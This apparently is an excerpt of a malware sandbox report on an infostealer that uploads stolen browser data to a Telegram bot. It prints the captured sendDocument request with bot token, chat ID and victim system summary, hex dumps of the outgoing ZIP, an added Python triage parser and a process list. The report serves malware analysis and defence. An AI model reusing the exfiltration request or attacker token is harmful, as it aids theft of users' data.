Data Raw: 4d 44 60 9b cc a4 eb 3a a6 69 42 12 b5 56 32 93 69 9a 88 08 fa be 67 58 af 91 44 44 10 11 64 26 d3 34 21 89 5a 2b d3 34 11 11 44 04 00 b6 01 c8 4c 32 13 49 dc 4f 12 92 b8 9f 6d 32 13 49 48 02 c0 36 b6 91 04 80 24 5a 6b d8 46 12 92 00 88 08 24 11 08 db d8 26 33 b1 0d 40 44 20 89 cc 04 40 12 00 b6 b1 0d 80 6d 4a 29 d8 06 c0 36 92 00 b0 8d 6d 4a 29 3c 90 6d ee 27 09 49 d8 26 33 01 90 04 80 24 00 0a c2 36 b6 b1 8d 24 00 24 61 9b da 05 d3 34 01 10 11 d8 66 9a 26 00 6a ad 64 26 00 b6 01 90 44 44 60 1b db 48 df b7 32 ff 99 8e 2e c1 d1 25 38 da 85 a3 4b b0 71 0c 36 8e c3 c6 31 d8 38 06 24 ff 9f d9 e6 7e 92 f8 d7 0b 5e 28 07 0f 64 01 36 cf 12 c1 03 15 99 07 92 c4 15 c9 f3 93 99 d8 0d db 60 83 cd 65 36 97 45 00 20 f3 2c b6 79 b6 e0 df c5 e6 df 43 e6 7f 1c db bc a8
Data Ascii: (compressed ZIP payload, no readable text)

Timestamp: 2024-07-29 05:32:55 UTC
Bytes transferred: 16384
Direction: OUT
Data Raw: f7 93 04 80 6d ee 27 09 db d8 46 12 00 b6 b1 cd 15 c9 fd 24 f1 fc b4 69 22 4a 41 12 6d 9a 50 04 a5 14 5a 6b 54 84 6d 6c 23 89 88 40 12 b6 b1 8d 6d 00 24 61 1b db 00 44 04 92 68 ad 61 9b e7 26 09 00 49 d8 06 20 22 b0 4d 66 72 3f 49 00 04 02 c0 36 b6 c9 4c 6c 13 11 48 a2 20 ee 97 99 d8 c6 36 a5 14 6c 63 1b db 00 44 04 f7 8b 08 6c 63 1b 80 88 c0 36 99 49 66 52 6b a5 b5 86 6d 4a 29 00 64 26 b6 89 08 64 9e 83 24 00 6c d3 5a a3 d6 8a 6d 6c 23 09 80 cc 24 00 49 48 02 c0 36 99 89 6d 24 11 11 48 42 06 db 00 d8 c6 36 f7 b3 4d df f7 d8 26 33 b1 8d 6d 24 71 bf 88 8a 6d 6c 63 1b db 48 e2 b9 d9 06 40 12 00 b6 01 08 04 80 24 00 6c 93 99 48 22 22 98 a6 09 00 49 48 e2 7e b6 b1 4d 44 00 60 9b cc c4 36 00 a5 14 4a 29 e4 38 21 09 49 dc cf 36 00 92 00 b0 8d 6d ee 27 09 db 00
Data Ascii: (compressed ZIP payload, no readable text)

Timestamp: 2024-07-29 05:32:55 UTC
Bytes transferred: 16384
Direction: OUT
Data Raw: 11 47 9e f3 9f 41 e6 85 b2 cd 7f 84 4f 7e dc 67 f1 39 9f f7 85 fc 67 f8 ac cf f8 54 3e e7 f3 be 90 9f fa c9 1f e7 af ff ea 2f f9 85 1b de 86 bf 3d f6 32 bc 48 c4 0b 90 3c a7 e4 f9 91 83 e7 c7 bc 00 e2 39 19 c4 b3 99 fb 05 92 b0 cd 15 01 80 24 ee 27 09 24 ee 27 09 00 49 84 c4 fd 6c 63 1b db d8 c6 36 b6 21 1b 72 43 06 db 00 d8 e6 32 1b 00 45 00 60 9b 07 92 04 80 6d fe 3d 82 7f a7 34 ff 93 d9 e6 3f 82 cc f3 65 9b ff 4c b6 79 61 c2 fc a7 b2 cd bf 4f f0 42 a5 79 61 6c 23 89 e0 d9 6c 23 09 00 db bc 30 b6 f9 cf 24 f3 42 d9 e6 85 91 83 17 c6 36 2f 5c f2 c2 d8 e6 85 09 07 cf cd 36 f7 93 f9 0f 65 9b 07 0a fe 7d 6c f3 ef 21 f3 42 d9 06 40 12 0f 64 1b 00 99 7f 13 db 00 58 5c 26 f3 42 05 2f 98 6d 5e 10 db 00 c8 3c 8b 6d ee 27 89 17 c4 36 ff 59 6c 03 10 cd 3c 90 24 1e
Data Ascii: (compressed ZIP payload, no readable text)

Timestamp: 2024-07-29 05:32:55 UTC
Bytes transferred: 16384
Direction: OUT
Data Raw: a8 9b fe 1e c5 0c 9c 40 82 0d 4e 20 c1 c9 8f 3c f9 4e 3e f8 d7 7e 0f 80 17 bf ee 61 fc e6 07 7e 23 0f b4 bb 7b 91 7f f8 eb df e6 95 5f e3 2d b9 df ee ee 2e 5b 5b 5b 48 42 12 00 f5 4d 5f 93 fc e5 df 07 e0 0f ee d8 e7 0d fe 78 8b ff 6e 32 cf 63 e7 49 6f c6 0b 72 cb f1 eb f8 9b 8f fb 41 00 fe e0 d6 bf e1 f7 9f fe d7 7c d2 eb bc 17 00 ef fe 83 9f c9 2f 3c fe f7 79 41 ee fb cc 5f e1 df e3 b3 3e e3 53 f9 e2 17 fb 2c fe 35 6c f3 42 39 f8 ef 24 fe 7d c2 fc 87 4b 71 99 24 32 93 e7 4b 02 20 28 00 d8 c6 36 88 e7 a0 08 00 2c 90 84 24 24 01 20 89 50 05 c0 34 6c 43 1a db d8 0d db b8 35 2e cb 06 36 d8 5c 26 83 21 a8 fc 7b d8 e6 bf 9a 6d ee 27 f3 ef 22 f3 1c 6c f3 af 13 bc 30 b6 f9 0f 67 73 3f 99 ff 10 92 b0 8d 6d 1e 48 e6 df c5 36 2f 4c f0 af 67 9b 7f 89 cc 73 b0 cd 7f
Data Ascii: (compressed ZIP payload, no readable text)

Timestamp: 2024-07-29 05:32:55 UTC
Bytes transferred: 16384
Direction: OUT
Data Raw: fc 49 c2 36 cf cd 36 2f 8a 30 97 d9 e6 39 a4 01 90 c4 fd 6c 73 bf 00 6c e3 30 00 b6 79 20 db 00 48 02 20 cc 65 92 00 b0 8d 6d 20 00 90 c4 fd 6c 73 3f 49 3c 37 db 3c 4b 9a fb d9 e6 7e 32 d8 a6 d6 8a 6d 00 6c a3 34 0f d4 30 b6 01 90 44 41 dc cf 36 b6 01 90 04 80 78 4e b6 01 b0 0d 80 24 00 24 21 89 d6 1a f7 93 c4 bf c4 36 0f 64 9b cc 24 22 88 08 00 5a 6b 48 a2 94 82 87 09 00 49 00 d8 46 12 92 00 b0 4d 66 62 1b 49 00 d8 46 12 11 c1 fd 6c 63 9b fb 49 42 12 99 c9 fd 6c 73 3f 49 48 02 1b a5 b9 5f 66 62 9b 88 20 22 c8 4c ee 27 09 db d8 06 c0 36 92 88 08 24 61 1b db d8 e6 7e 45 60 1b db dc 4f 12 92 b8 22 c8 4c 6c 03 20 09 49 d8 c6 36 5d d7 91 99 d8 46 12 00 99 89 6d 24 51 64 32 13 db 3c 90 6d 6c 13 11 48 02 40 12 00 b6 b1 0d 80 1c 44 04 99 49 66 52 6b 05 a0 b5 06
Data Ascii: (compressed ZIP payload, no readable text)
Timestamp: 2024-07-29 05:32:56 UTC
Bytes transferred: 389
Direction: IN
Data: HTTP/1.1 200 OK
                                Server: nginx/1.18.0
                                Date: Mon, 29 Jul 2024 05:32:56 GMT
                                Content-Type: application/json
                                Content-Length: 1267
                                Connection: close
                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
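The session above is the exfiltration itself: one sendDocument call to api.telegram.org (149.154.167.220:443, decrypted here by the sandbox; on the wire this is ordinary TLS to Telegram) whose URL path carries the bot token, whose query string carries the chat_id and a percent-encoded victim summary as the caption, and whose multipart body (content-length 891245, of which only the first 16 KB chunk is shown) is a ZIP named "[US]_8.46.123.33.zip" with "Autofill/" as its first entry. The following is an added example, not code from the report or from the sample: it pulls token, chat_id and caption out of the captured request line, turns the caption into fields and loot counts, and walks the captured multipart head into the ZIP local-file headers, including the second one that the capture cuts off. Both inputs are copied from this page; parse_request, parse_caption, loot_summary, parse_upload_head, zip_local_headers and dos_datetime are this example's own names.

```python
"""Triage the Telegram sendDocument upload captured in the session above.
Added example for this report, not code from Joe Sandbox or from the sample. Both
inputs are copied from the capture on this page: the POST request line (the report
truncates its caption after 'Tags%20Co') and the first bytes of the multipart body,
which end inside the second ZIP local-file header."""
import re
import struct
from urllib.parse import parse_qs

REQUEST_LINE = (  # as captured; the report shows no HTTP version after the target
    r"POST /bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendDocument?chat_id=5795480469"
    r"&caption=%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.33%0ACountry:%20United%20States%0ACity:%20New%20York"
    r"%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-04:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user"
    r"%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz"
    r"%0AGPU:%20EC6CD_O6G%20(1280,%201024)%0AHWID:%205229958482931895%0ACurrent%20Language:%20English%20(United%20States)"
    r"%0AFileLocation:%20C:\Users\user\Desktop\765iYbgWn9.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0A"
    r"Antivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0A"
    r"Passwords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020"
    r"%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0A%0A"
    r"Tagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Co"
)

BODY_HEAD = (  # multipart part headers, then the first 69 bytes of the ZIP as captured
    b"--a823006a12d4c370-61345550b38b208b-8e57514f4d7e4bc0-4d5848ed09e1c9e1\r\n"
    b'Content-Disposition: form-data; name="document"; filename="[US]_8.46.123.33.zip"\r\n'
    b"Content-Type: application/zip\r\n\r\n"
    # local-file header: stored, DOS time 0x3b22 / date 0x58fd, 9-byte name "Autofill/"
    + bytes.fromhex("504b0304 1400 0000 0000 223b fd58 00000000 00000000 00000000 0900 0000")
    + b"Autofill/"
    # next header announces an 8-byte name, but the capture stops after the fixed part
    + bytes.fromhex("504b0304 1400 0000 0000 223b fd58 00000000 00000000 00000000 0800 0000")
)
LOCAL_HEADER = struct.Struct("<4sHHHHHIIIHH")  # 30-byte fixed part of a ZIP local-file header
CHECK, CROSS = "\u2705", "\u274c"              # tick / cross the caption uses per loot category

def dos_datetime(mdate, mtime):
    """Decode MS-DOS date and time fields (local time, 2-second resolution)."""
    return (1980 + (mdate >> 9), (mdate >> 5) & 0xF, mdate & 0x1F,
            mtime >> 11, (mtime >> 5) & 0x3F, (mtime & 0x1F) * 2)

def zip_local_headers(data):
    """Yield local-file headers from the start of a ZIP stream. Stops at the first
    non-PK signature and flags an entry whose name lies beyond the captured bytes."""
    pos = 0
    while pos + LOCAL_HEADER.size <= len(data):
        sig, _ver, flags, method, mtime, mdate, crc, csize, usize, nlen, xlen = LOCAL_HEADER.unpack_from(data, pos)
        if sig != b"PK\x03\x04":
            break
        name = data[pos + LOCAL_HEADER.size:pos + LOCAL_HEADER.size + nlen]
        if len(name) < nlen:
            yield {"name": None, "truncated": True}
            return
        yield {"name": name.decode("cp437"), "method": method, "flags": flags, "crc32": crc,
               "compressed_size": csize, "size": usize, "mtime": dos_datetime(mdate, mtime),
               "truncated": False}
        # Skip name, extra field and data. With flag bit 3 (data descriptor) csize is 0 here,
        # the next signature will not line up, and the check above stops cleanly.
        pos += LOCAL_HEADER.size + nlen + xlen + csize

def parse_upload_head(body):
    """First part's headers (boundary, filename, content type) and the ZIP entries after them."""
    boundary_end = body.index(b"\r\n")
    headers_end = body.index(b"\r\n\r\n", boundary_end)
    headers = {}
    for raw in body[boundary_end + 2:headers_end].split(b"\r\n"):
        name, _, value = raw.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    m = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
    return {"boundary": body[2:boundary_end].decode("ascii"), "part_headers": headers,
            "filename": m.group(1) if m else None,
            "entries": list(zip_local_headers(body[headers_end + 4:]))}

def parse_caption(caption):
    """'Key: value' lines become entries; section markers such as '- IP Info -' have no
    ': ' and are skipped; indented '    - item' lines (the antivirus list) become a list."""
    fields, last = {}, None
    for line in caption.splitlines():
        if line.startswith("    - ") and last is not None:
            items = fields[last] if isinstance(fields[last], list) else []
            fields[last] = items + [line[6:]]
            continue
        key, sep, value = line.partition(": ")
        if sep:
            last = key.strip()
            fields[last] = value.strip()
    return fields

def parse_request(line):
    """Bot token, API method, chat_id and the percent-decoded caption from the request line."""
    m = re.match(r"^(\w+) /bot([^/\s]+)/(\w+)\?(.*?)(?: HTTP/\d\.\d)?$", line)
    if not m:
        raise ValueError("not a Telegram Bot API request line")
    http_method, token, api_method, query = m.groups()
    params = parse_qs(query, keep_blank_values=True)   # percent-decodes as UTF-8
    caption = params.get("caption", [""])[0]
    return {"http_method": http_method, "token": token, "bot_id": token.split(":", 1)[0],
            "api_method": api_method, "chat_id": params.get("chat_id", [None])[0],
            "caption": caption, "fields": parse_caption(caption)}

def loot_summary(fields):
    """Per-category counts from the 'Log Info' lines: '✅ 20' -> 20, bare tick -> 1, cross -> 0."""
    out = {}
    for key, value in fields.items():
        if isinstance(value, str) and value[:1] in (CHECK, CROSS):
            digits = value[1:].strip()
            out[key] = int(digits) if digits.isdigit() else int(value[0] == CHECK)
    return out
```

Run against the captured data this yields bot id 6082381502 and chat_id 5795480469 (the two values worth reporting to Telegram and blocking in proxy logs), a caption that reports 2 cookies and 20 files stolen and no passwords, wallets, cards, FTP/SSH servers or Discord tokens from this sandbox run, and a ZIP whose first entry "Autofill/" was stamped 2024-07-29 in the sandbox's local time. The truncated second header is returned as a flagged entry rather than silently dropped, so a reader of a partial capture knows more entries followed.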



                                Target ID:0
                                Start time:01:32:06
                                Start date:29/07/2024
                                Path:C:\Users\user\Desktop\765iYbgWn9.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\Desktop\765iYbgWn9.exe"
                                Imagebase:0x7ff6a5820000
                                File size:5'438'976 bytes
                                MD5 hash:0534AB10184891CD61D262BFD79B7B4C
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:3
                                Start time:01:32:43
                                Start date:29/07/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
                                Imagebase:0x7ff7be880000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:01:32:43
                                Start date:29/07/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                No disassembly